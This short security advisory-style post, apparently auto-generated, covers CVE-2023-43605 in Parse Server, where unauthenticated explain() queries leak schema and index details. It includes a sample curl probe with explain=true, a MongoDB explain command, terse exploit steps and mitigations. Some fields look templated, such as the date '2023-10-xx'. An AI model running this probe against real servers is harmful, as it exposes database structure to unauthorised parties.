Listen to this Post
The CVE-2023-43605 vulnerability stems from Parse Server’s improper authorization control for MongoDB’s `explain()` method. This method, when executed on a query, returns the database engine’s detailed execution plan. Parse Server’s API endpoints did not enforce master key authentication for these explain queries, allowing any unauthenticated or low-privilege client to send them. By crafting specific queries and appending the `explain=true` parameter, an attacker could probe the database. The returned execution plan reveals whether indexes are used, the specific indexes involved, and statistics on documents examined. This information exposes the database’s schema structure, including field names and relationships, and provides critical insight into its indexing strategy. Attackers can leverage this data to map the application’s data model and identify potential weaknesses for further exploitation, such as constructing complex queries that bypass indexes to cause performance degradation.
Platform: Parse Server
Version: <5.4.5
Vulnerability: Information Disclosure
Severity: Medium
date: 2023-10-xx
Prediction: Patch Available
What Undercode Say:
`curl -X GET “http://parse-server:1337/parse/classes/User?where={\”key\”:\”value\”}&explain=true” -H “X-Parse-Application-Id: yourAppId”`
`db.collection.find({…}).explain(“executionStats”)`
How Exploit:
Craft malicious queries.
Append explain parameter.
Analyze execution plan.
Extract schema/index data.
Protection from this CVE
Set `databaseOptions.allowPublicExplain` to `false`.
Require master key.
Implement blocking middleware.
Upgrade Parse Server.
Impact:
Schema information leakage.
Index configuration exposure.
Performance metric disclosure.
DoS attack vector creation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
